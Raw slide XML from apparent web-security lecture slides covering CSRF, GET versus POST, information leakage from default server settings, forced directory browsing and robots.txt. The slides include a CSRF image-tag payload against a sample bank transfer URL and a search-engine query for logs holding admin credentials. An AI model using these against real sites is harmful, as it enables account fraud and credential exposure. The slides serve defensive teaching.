            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>CSRF attacks are difficult to track</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Commands are executed in the context of the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The request comes from the users IP address so it is difficult to hunt down the hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The hacker is essentially given all of the user’s privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>XSS facilitates CSRF via “Link Injection”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>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FA1870B3-FD62-A51E-E3E5-0EC17C4686EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>CSRF Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668675" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23A6FE5B-C6C2-485B-22A8-AC945D063468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>A hacker posts to a message board containing an image tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>&lt;img src= “http://yourbank.com/transfer?     to_account=my_account_number&amp;amount=all_of_your_money&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>An unsuspecting user logs into yourbank.com and authenticates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The user then visits said message board</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>A request is issued from the victim’s browser to the bank’s website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The bank’s website transfers the user’s money to the hacker’s account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="16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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB980D11-D05A-E7C2-8603-639A59758233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="670723" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA547C90-C7D4-E92A-E476-2758565824E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Add a secondary authentication mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Such as an impossible to guess token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Eliminate XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Require a confirmation page before executing potentially dangerous actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Use POST as your form action and only accept POST requests on the server for sensitive data ! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Incoming CSRF requests will fail since the parameter is in the URL and not the post body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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05495184-2322-F887-590B-3F6FCCCE38C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Post vs Get</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="771075" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30C43B6B-849C-B88D-A7E0-98D26026D5A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Requests come in two flavors: POST &amp; GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>GET: parameters are sent in the URL itself.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>POST: parameters are sent in the request body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>DO NOT use GET for anything that changes the server state or contains sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>GET requests are logged in the web server access logs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Also shows up in the browser history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>For example GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>login?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>me&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>suparsekretpasswerd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>DO use POST for every action that changes the server state and reject all non-POST methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>&lt;Script&gt;, Image, Link and some other HTML tags ALWAYS use GET. By accepting POST only on Server, vulnerability is mitigated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Prevents unintentional actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Most search engines won’t crawl POST forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Helps prevent duplicate submissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="36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9115E43A-2749-2810-1093-1062505E5113}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Misconfigured, Default Settings, Unpatched Systems – Info Leakage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575491" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42EC2850-9805-5759-1424-46F6357EEAF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>By default, you may already be leaking information!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Includes all “infrastructure” applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Web Server (Apache) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Access logs are public by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Directory listing is enabled by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Application Server (Tomcat, PHP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>Coldfusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Database Server (MySQL, MS-SQL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Public accounts enabled by default for MS SQL Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> party applications (PHP message board, webmail, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Attackers look for easy access to your server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Exploit a known vulnerability if infrastructure application doesn’t have latest patches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Gain access to server using default credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Use default installed “snoop” or example pages to learn more about your server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1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9313A62E-D5CC-7322-75E8-B58A02A51FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Forced Directory Browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576515" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB44C962-C00C-3BBB-F922-00744D416A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Try to force directory browsing by eliminating anything past the various “/” in the URLs of your web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>If directory browsing is allowed on your web server, files you don’t want public could be displayed or at the least give the hacker more information about your system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="576516" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0C3E151-BFE8-A6D0-E859-C482A3DDE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985" y="3961002"/>
            <a:ext cx="67056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B002D325-C6BE-FF24-1DCE-8D4C0F43F804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Robots.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577539" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F12ED56A-9E92-632B-552E-D7E7077108E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>robots.txt files are the first place attackers look</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Robots.txt is web accessible and contains URLs you don’t want indexed by a search engine.  This might be the kind of data attackers want</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Use access controls instead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="577540" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE72DDC1-42C8-F408-1302-55E7B5F57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1" y="4163037"/>
            <a:ext cx="7924800"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196B9259-A7F1-4B23-8BAF-634F3158C801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>"admin account info" filetype:log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
